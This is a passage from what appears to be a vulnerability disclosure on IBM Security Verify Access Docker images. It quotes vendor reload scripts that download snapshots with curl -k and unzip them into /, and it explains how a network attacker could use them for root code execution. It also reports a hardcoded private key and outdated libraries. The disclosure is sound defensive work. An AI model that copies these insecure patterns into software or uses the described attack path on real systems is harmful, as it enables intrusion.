An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform.

This script is defined at the end of the /usr/sbin/install_system.sh script:

Content of /usr/sbin/install_system.sh in verify-access-runtime:

[code:shell] 239 # 240 # Ensure that the reload script is executable. 241 # 242 243 mv /sbin/reload.sh /sbin/runtime_reload 244 245 chmod 755 /sbin/runtime_reload [/code]

Analysis of /sbin/runtime_reload:

The function download_from_cfgsvc() is insecure as the curl command uses the -k option (as known as --insecure) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the -k option.

We can also see that Postgres does not have passwords in line 144, already found in Lack of authentication in Postgres inside verify-access-runtime.

[code:shell] 67 ############################################################################# 68 # Attempt to download the snapshot from the configuration service. 69 70 download_from_cfgsvc() 71 { 72 # No need to download the snapshot if the configuration service has not 73 # been defined. 74 if [ -z "$CONFIG_SERVICE_URL" ] ; then 75 return 76 fi 77 78 if [ $1 -eq 1 ] ; then 79 Echo 960 80 fi 81 82 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 83 "$CONFIG_SERVICE_URL/snapshots/basename $snapshot?type=File" \ 84 -o $snapshot 85 86 if [ $? -ne 0 ] ; then 87 if [ $1 -eq 1 ] ; then 88 Echo 961 89 fi 90 91 rm -f $snapshot 92 else 93 Echo 962 94 fi 95 } [...] 97 ############################################################################# 98 # Main line. 99 100 # 101 # Download the snapshot file. 102 # 103 104 download_from_cfgsvc 1 [...] 127 # 128 # Update the configuration database. 129 # 130 131 Echo 997 132 133 db_root=/var/postgresql/config 134 db_snapshot=$db_root/snapshot.sql 135 db_port=5432 136 db_name=config 137 db_user=www-data 138 139 if [ ! -f $db_snapshot ] ; then 140 Echo 975 141 exit 1 142 fi 143 144 psql -U $db_user -d $db_name -p $db_port -f $db_snapshot -q -b -w

[/code]

Details - Remote Code Execution due to insecure reload script in verify-access-wrp

It was observed that the Docker image verify-access-wrp uses a highly insecure reload script.

An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. He can also overwrite any file present in the verify-access-wrp docker instance (getting a Remote Code Execution).

This script is defined at the end of the /usr/sbin/install_system.sh script:

Content of /usr/sbin/install_system.sh in verify-access-wrp:

[code:shell] 210 # 211 # Ensure that the restart script is executable. 212 # 213 214 mv /sbin/restart.sh /sbin/wrprestart 215 216 chmod 755 /sbin/wrprestart [/code]

Analysis of /sbin/wrprestart:

The function download_from_cfgsvc() is insecure as the curl command uses the -k option (as known as --insecure) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the -k option.

The openldap.zip file found in the malicious snapshot file will then be decrypted using a previously found hardcoded key and extracted into the / directory (line 154 and 156) and openldap will be restarted with the new configuration file, allowing an attacker to get a Remote Code Execution by specifying a malicious slapd.conf file (stored inside openldap.zip, in etc/openldap/slapd.conf).

Since the extraction of openldap.zip takes place in /, it is also possible to overwrite any file as root (and get Remote Code Execution, e.g. by replacing a program).

[code:shell] 85 ############################################################################# 86 # Attempt to download the snapshot from the configuration service. 87 88 download_from_cfgsvc() 89 { 90 # No need to download the snapshot if the configuration service has not 91 # been defined. 92 if [ -z "$CONFIG_SERVICE_URL" ] ; then 93 return 94 fi 95 96 if [ $1 -eq 1 ] ; then 97 Echo 960 98 fi 99 100 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 101 "$CONFIG_SERVICE_URL/snapshots/basename $snapshot?type=File" \ 102 -o $snapshot 103 104 if [ $? -ne 0 ] ; then
105 if [ $1 -eq 1 ] ; then
106 Echo 961
107 fi 108 109 rm -f $snapshot 110 else 111 Echo 962 112 fi 113 } [...] 137 ############################################################################# 138 # Process the OpenLDAP configuration and then restart the OpenLDAP server. 139 140 restart_openldap_server() 141 { 142 # Check to see whether the embedded LDAP server has been enabled or 143 # not. 144 ldap_conf="/var/PolicyDirector/etc/ldap.conf" 145 ldap_host=$pdconf -f $ldap_conf getentry ldap host 146 147 if [ "$ldap_host" != "127.0.0.1" ] ; then 148 return 149 fi 150 151 Echo 964 152 153 # Decrypt and extract the LDAP configuration. 154 isva_decrypt $snapshot_tmp_dir/openldap.zip 155 156 unzip -q -o $snapshot_tmp_dir/openldap.zip -d / 157 158 # Change the LDAP port from 389 to 6389 (389 is a privileged port). 159 $pdconf -f $ldap_conf setentry ldap port 6389 160 161 # Stop the LDAP server. 162 busybox killall -SIGHUP slapd 163 164 while $(busybox killall -0 slapd 2>/dev/null); do 165 sleep 1 166 done 167 168 # Start the LDAP server. 169 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0 170 } [...] 260 ############################################################################# 261 # Main line. 262 263 # 264 # Attempt to download the configuration data from the configuration service. 265 # 266 267 # 268 # Wait for the snapshot file. 269 # 270 271 download_from_cfgsvc 1 [...] 305 # 306 # Restart the OpenLDAP server. 307 # 308 309 restart_openldap_server [/code]

Details - Hardcoded private key for IBM ISS (ibmcom/verify-access)

It was observed that the ibmcom/verify-access Docker image contains a hardcoded private key used by the license client iss-lum:

kali-docker# pwd 
/home/user/ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/lum

kali-docker# ls -al 
total 492 
drwxr-xr-x  2 root root   4096 Jun  8 01:43 . 
drwxr-xr-x 25 root root   4096 Jun  8 04:09 .. 
-rwxr-xr-x  1 root root   1296 Oct 20  2016 externalTrustSettings.xml
-rwxr-xr-x  1 root root 445080 Oct 20  2016 iss-external.kdb
-rwxr-xr-x  1 root root    129 Oct 20  2016 iss-external.sth
-rwxr-xr-x  1 root root    100 Oct 20  2016 iss-lum.conf
-rwxr-xr-x  1 root root   3649 Oct 20  2016 isslum-usLocalSettings.xml
-rwxr-xr-x  1 root root    725 Oct 20  2016 lum_triggers.conf
-rwxr-xr-x  1 root root   1858 Oct 20  2016 private.pem
-rwxr-xr-x  1 root root    451 Oct 20  2016 public.pem
-rwxr-xr-x  1 root root   3926 Oct 20  2016 .udrc
-rwxr-xr-x  1 root root    806 Oct 20  2016 update-settings.conf
-rwxr-xr-x  1 root root   7352 Oct 20  2016 update-status.xsd
-rwxr-xr-x  1 root root    561 Jun  8 01:32 UpdateTypeNames.config
-rwxr-xr-x  1 root root      0 Dec 31  1969 .wh..wh..opq

kali-docker# sha256sum private.pem public.pem
e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem
3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem

When analyzing the podman instance verify-access, we can confirm the key has not been updated:

[isam@verify-access lum]$ sha256sum private.pem  public.pem
e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d  private.pem
3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20  public.pem
[isam@verify-access lum]$

The private key appears to be used by several programs:

    • /opt/dca/bin/dcatool
    • /usr/bin/isslum-modstatus
    • /usr/sbin/iss-lum
    • /usr/sbin/mesa_config
    • /usr/sbin/mesa_eventsd
    • /usr/sbin/isslum-installer

The license client is using outdated codes and may contain vulnerabilities.

The keys are hardcoded and have not been updated for 6 years, which brings a question how the license client is being maintained.

Details - dcatool using an outdated OpenSSL library (ibmcom/verify-access)

It was observed that the dcatool program located in /opt/dca/bin is linked with an outdated OpenSSL library located in the non-standard directory /opt/dca/lib:

  • From a live system:

    [isam@verify-access bin]$ pwd /opt/dca/bin [isam@verify-access bin]$ ls -la total 580 drwxr-xr-x 2 root root 4096 Jun 8 13:43 . drwxr-xr-x 4 root root 4096 Jun 8 13:43 .. -rwxr-xr-x 1 root root 373208 Jun 8 13:31 dcatool -rwxr-xr-x 1 root root 207872 Jun 8 13:31 dcaupdate [isam@verify-access bin]$ ldd dcatool | grep ssl libssl.so.10 => /opt/dca/lib/libssl.so.10 (0x00007fafcfb1e000) libssl.so.1.1 => /lib64/libssl.so.1.1 (0x00007fafcda45000) [isam@verify-access bin]$ ldd dcaupdate | grep ssl libssl.so.10 => /opt/dca/lib/libssl.so.10 (0x00007fe04980d000) libssl.so.1.1 => /lib64/libssl.so.1.1 (0x00007fe047734000)

Analysis of the library:

[isam@verify-access lib]$ pwd
/opt/dca/lib
[isam@verify-access lib]$ ls -la
total 4156
drwxr-xr-x 2 root root    4096 Jun  8 13:43 . 
drwxr-xr-x 4 root root    4096 Jun  8 13:43 .. 
-rwxr-xr-x 1 root root 1252080 Jun  8 13:31 libboost_regex.so.1.53.0
-rwxr-xr-x 1 root root 2521496 Jun  8 13:31 libcrypto.so.10
lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicudata.so.54 -> /usr/lib64/libicudata.so
lrwxrwxrwx 1 root root      24 Jun  8 13:43 libicui18n.so.54 -> /usr/lib64/libicui18n.so
lrwxrwxrwx 1 root root      22 Jun  8 13:43 libicuuc.so.54 -> /usr/lib64/libicuuc.so
-rwxr-xr-x 1 root root  470328 Jun  8 13:31 libssl.so.10
[isam@verify-access lib]$ sha256sum *so*
a4b9594f78c0e5cfa14c171e07ae439dccd0ef990db8c4b155c68fde43a8d9a9  libboost_regex.so.1.53.0
8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  libcrypto.so.10
07796e84fc3618a64259cfff7a896e57fc90f6b270d690d953f4792c2b7e21ac  libicudata.so.54
49e6f6b12d118118c7d17cec26f80c81b39c89ea01a30eaf26abb07859d909fe  libicui18n.so.54
1504c73f432bc24414c0ca69d29bdb04c04ba2269b752c320306cb25aadd5972  libicuuc.so.54
523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  libssl.so.10
[isam@verify-access lib]$

We can retrieve these 2 libraries inside the ibmcom/verify-access image and identify the version of OpenSSL:

kali-docker# sha256sum **/libssl.so.10                                                                                                
523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10
kali-docker# sha256sum **/libcrypto.so.10                                                                                             
8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c  698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10

kali-docker# kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10|grep -i openssl
[...][
OpenSSL 1.0.2k-fips  26 Jan 2017
[...]
kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10|grep -i openssl
OpenSSL 1.0.2k-fips  26 Jan 2017
[...]

The libraries located in /opt/dca/lib are completely outdated and are vulnerable to known CVEs.

These libraries are likely used by IBM-specific programs.

The Docker images contain known vulnerabilities.

Details - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys

It was observed that the /usr/sbin/iss-lum program from the verify-access Docker image contains outdated OpenSSL code (from the library 0.9.7) from 2007. The iss-lum program is the license client that will connect to external servers.

This program runs inside the instance:

[isam@verify-access /]$ ps -auxw
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
isam           1  0.0  0.0  12060   132 ?        Ss   Oct04   0:00 /bin/sh /sbin/bootstrap.sh
isam         313  0.0  0.0  24532    68 ?        Ss   Oct04   0:00 /usr/sbin/mesa_crashd
isam         315  0.1  0.0  24532  1032 ?        S    Oct04   1:57 /usr/sbin/mesa_crashd
isam         319  0.0  0.0  69160   144 ?        Ss   Oct04   0:00 /usr/sbin/mesa_syslogd
isam         321  0.0  0.0  69224  1280 ?        S    Oct04   0:00 /usr/sbin/mesa_syslogd
isam         400  0.0  0.0 102760   200 ?        Ss   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000
isam         401  0.0  0.0 710856   316 ?        Sl   Oct04   0:00 /usr/sbin/mesa_eventsd -m 1000
pgresql      435  0.0  0.0 188380  7016 ?        Ss   Oct04   0:02 /usr/bin/postgres -D /var/postgresql/config/data
pgresql      436  0.0  0.0 138892   184 ?        Ss   Oct04   0:00 postgres: logger   
pgresql      447  0.0  0.0 188380  1600 ?        Ss   Oct04   0:00 postgres: checkpointer   
pgresql      448  0.0  0.0 188516  1288 ?        Ss   Oct04   0:01 postgres: background writer   
pgresql      449  0.0  0.0 188380  1468 ?        Ss   Oct04   0:01 postgres: walwriter   
pgresql      450  0.0  0.0 189112  1864 ?        Ss   Oct04   0:01 postgres: autovacuum launcher   
pgresql      451  0.0  0.0 139024   588 ?        Ss   Oct04   0:05 postgres: stats collector   
pgresql      452  0.0  0.0 188916  1016 ?        Ss   Oct04   0:00 postgres: logical replication launcher   
www-data     548  0.4  4.8 4920352 387128 ?      SLl  Oct04   7:53 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/default/java.security -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/lmi -Xbootclasspath/a:/opt/pdjrte/java/export/rgy/com.tivoli.pd.rgy.jar:/opt/ibm/wlp/usr/servers/runtime/lib/global/xercesImpl.jar -Dorg.osgi.framework.system.packages.extra=com.tivoli.pd.rgy,com.tivoli.pd.rgy.authz,com.tivoli.pd.rgy.exception,com.tivoli.pd.rgy.ldap,com.tivoli.pd.rgy.nls,com.tivoli.pd.rgy.util,com.ibm.misc,com.ibm.net.ssl.www2.protocol.https,com.sun.jndi.ldap,org.apache.xml.serialize -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 --add-exports java.base/sun.security.action=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util.concurrent=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.naming/javax.naming.spi=ALL-UNNAMED --add-opens jdk.naming.rmi/com.sun.jndi.url.rmi=ALL-UNNAMED --add-opens java.naming/javax.naming=ALL-UNNAMED --add-opens java.rmi/java.rmi=ALL-UNNAMED --add-opens java.sql/java.sql=ALL-UNNAMED --add-opens java.management/javax.management=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/java.awt.image=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED -jar /opt/IBM/wlp/bin/tools/ws-server.jar default --clean
isam         748  0.0  0.0 270992     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
ldap         753  0.0  4.3 1314228 346548 ?      Sl   Oct04   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
isam         757  0.0  0.0 271124     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground
ivmgr        762  0.0  0.1 1070184 10860 ?       Sl   Oct04   0:01 /opt/PolicyDirector/bin/pdmgrd -foreground
isam         805  0.0  0.0  71488   316 ?        Ss   Oct04   0:00 /usr/sbin/iss-lum
isam         806  0.0  0.0 343920  5264 ?        Sl   Oct04   0:00 /usr/sbin/iss-lum
root         811  0.0  0.0  41984  2416 ?        Ss   Oct04   0:00 /usr/sbin/crond
isam         834  0.0  0.0 128400  2076 ?        Ssl  Oct04   0:00 /usr/sbin/rsyslogd
root         859  0.0  0.0 174348    96 ?        Ss   Oct04   0:00 /usr/sbin/wga_servertaskd
ivmgr        861  0.0  0.0 276544    84 ?        Sl   Oct04   0:00 /usr/sbin/wga_servertaskd
isam         870  0.0  0.0 273920     8 ?        Ssl  Oct04   0:02 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground
isam         877  2.1  0.2 563872 18472 ?        Sl   Oct04  38:43 wga_notifications -foreground
isam         889  0.0  0.0  12060    80 ?        S    Oct04   0:00 /bin/sh /sbin/bootstrap.sh
isam         892  0.0  0.0  23068    24 ?        S    Oct04   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log
isam      217541  4.0  0.0  19248  3836 pts/0    Ss   21:37   0:00 bash
isam      217564  0.0  0.0  54808  4080 pts/0    R+   21:37   0:00 ps -auxww
[isam@verify-access /]$

This program appears to establish connections to remote servers to check the license.

The OpenSSL library embedded inside the program is completely outdated (0.9.7j - Feb 2007):

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Furthermore, this program includes several hardcoded keys to decrypt the private key in /etc/lum/private.pem. In the function ctor_009:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Some decryption keys have been identified within the binaries used to check the license:

Function sub_4806C0:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Function ctor_009:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The Docker images contain known vulnerabilities.

Details - Outdated "IBM Crypto for C" library

It was observed that the IBM Crypto for C library is installed inside all the Docker images in the directory /usr/local/ibm/gsk8_64:

For example, from the Docker image verify-access-wrp:

kali-docker# cd ./_verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a 
kali-docker# find usr/local/ibm       
usr/local/ibm
usr/local/ibm/gsk8_64
usr/local/ibm/gsk8_64/lib64
usr/local/ibm/gsk8_64/lib64/libgsk8cms_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8kicc_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8p11_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8ssl_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8drld_64.so
usr/local/ibm/gsk8_64/lib64/C
usr/local/ibm/gsk8_64/lib64/C/icc
usr/local/ibm/gsk8_64/lib64/C/icc/icclib
usr/local/ibm/gsk8_64/lib64/C/icc/icclib/libicclib084.so
usr/local/ibm/gsk8_64/lib64/C/icc/icclib/ICCSIG.txt
usr/local/ibm/gsk8_64/lib64/libgsk8ldap_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8iccs_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8valn_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8acmeidup_64.so
usr/local/ibm/gsk8_64/lib64/N
usr/local/ibm/gsk8_64/lib64/N/icc
usr/local/ibm/gsk8_64/lib64/N/icc/icclib
usr/local/ibm/gsk8_64/lib64/N/icc/icclib/libicclib085.so
usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt
usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt
usr/local/ibm/gsk8_64/lib64/libgsk8dbfl_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8km2_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8km_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8sys_64.so
usr/local/ibm/gsk8_64/docs
usr/local/ibm/gsk8_64/copyright
usr/local/ibm/gsk8_64/inc
usr/local/ibm/gsk8_64/bin
usr/local/ibm/gsk8_64/bin/gsk8capicmd_64
usr/local/ibm/gsk8_64/bin/gsk8ver_64
usr/local/ibm/.wh..wh..opq
kali-docker#

This library is based on the opensource libraries zlib and OpenSSL. It was built in October 2020, as shown below:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Furthermore, the copyrights from the /usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt file indicate:

    • (C) 1995-2004 Jean-loup Gailly and Mark Adler - for zlib
    • Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved. - for OpenSSL

The /usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt file confirms the libraries were generated 2 years ago:

#
# IBM Crypto for C. 
# ICC Version 8.7.37.0
#
# Note the signed library contains a copy of cryptographic code from OpenSSL (www.openssl.org),
# zlib (www.zlib.org)
# and IBM code (www.ibm.com)
#
# Platform AMD64_LINUX
#
# Generated Tue Oct 13 12:09:08 2020
#
# File name=libicclib085.so
# File Hash (SHA256)=bbbb89eae43b11aba9a132a53207ca532236cd064b6aa0b84ea878a0b9bf8b4f
#
FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad
#
SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f
#
#Do not edit before this line
#
# Global Settings
ICC_ALLOW_2KEY3DES=1

The OpenSSL code and the zlib code are at least 2 year old and vulnerable to CVEs.

The Docker images contain known vulnerabilities.

Details - Webseald using outdated code with remotely exploitable vulnerabilities

It was observed that the webseald program borrows codes provided by open-source libraries containing outdated and vulnerable code. This program can be found inside these 2 images:

    • verify-access
    • verify-access-wrp

Webseald is reachable over the network.

Libraries used by webseald:

kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald
        linux-vdso.so.1 (0x00007fffe59f3000)
        libwsdaemon.so => not found
        libamwoauth.so => not found
        libamweb.so => not found
        libamwebrte.so => not found
        libpdsvcutl.so => not found
        libtivsec_msg.so => not found
        libpdz.so => not found
        libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)
        libtivsec_xslt4c.so.112 => not found
        libtivsec_xml4c.so => not found
        libtivsec_yamlcpp.so => not found
        libam_gssapi_krb5.so => not found
        libmodsecurity.so.3 => not found
        libamwredismgr.so => not found
        libhiredis.so.0.15 => not found
        libhiredis_ssl.so.0.15 => not found
        libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)
        libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)
        libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)
        libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)

The IBM-specific libraries (.so) have been analyzed only in surface to detect low-hanging fruits, and several vulnerabilities were found, including some pre-auth vulnerabilities.

Webseal is directly reachable from the network but uses the outdated and vulnerable code.

The quality of the code is extremely inequal between the libraries - some code is very well implemented (with secure calls to -cpy functions) and some code is vulnerable (with insecure calls to -cpy functions). These libraries contain some legacy codes that are not up to date with the current security standards.

Due to the lack of time, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries.

Libmodsecurity.so - 1 non-assigned CVE vulnerability

The /opt/pdweb/lib/libmodsecurity.so.3 library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

This version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE).

This version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124.

libtivsec_yamlcpp.so - 4 CVEs

This IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp.

Several vulnerabilities have been patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library.

This IBM-specific library is located at /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90).

When doing reverse engineering on this file, it appears no security patches have been imported from the official yaml-cpp repository.

We can identify several methods from the yaml-cpp library. For example, the method SingleDocParser::HandleFlowMap() found in /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

When analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code regarding a DeepRecursion class or any method implemented in the security patches. This DeepRecursion class is included in the now-patched versions.

The IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807.

Analysis of the security patches implementing new classes:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Furthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the libtivsec_yamlcpp.so library. This allows us to conclude the security patches have not been imported into the libtivsec_yamlcpp.so library.

Source code providing security patches:

Method HandleNode() from the security patches and the patched versions of yaml-cpp:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

With the assembly code extracted from the libtivsec_yamlcpp.so library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - with the lack of the patch located on the line 51.

Pseudo-code of method HandleNode():

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

This allows us to conclude that the libtivsec_yamlcpp.so library is vulnerable to these 4 CVEs.

libtivsec_xml4c.so - outdated Xerces-C library

This library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in /usr/lib64/libtivsec_xml4c.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so) and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C doesn't exist anymore and the latest release appears to be from 2007-2008).

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

This version appears to be quite outdated and is likely vulnerable to known CVEs (https://xerces.apache.org/xerces-c/secadv.html).

Details - Outdated and untrusted CAs used in the Docker images

It was observed that the Docker images will trust invalid Certificate Authorities (CA).

Using the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images.

It appears that these 4 Docker images trust some invalid, revoked or untrusted CAs.

Results for ibmcom/verify-access:10.0.4.0:

kali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0
Certificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\, Inc. - For authorized use only,O=VeriSign\, Inc.,C=US
 removed from Mozilla trust store, no reason given

Certificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US
 expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry)

Certificate CN=Test CA,O=genua mbh
 expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry)

Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
 expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
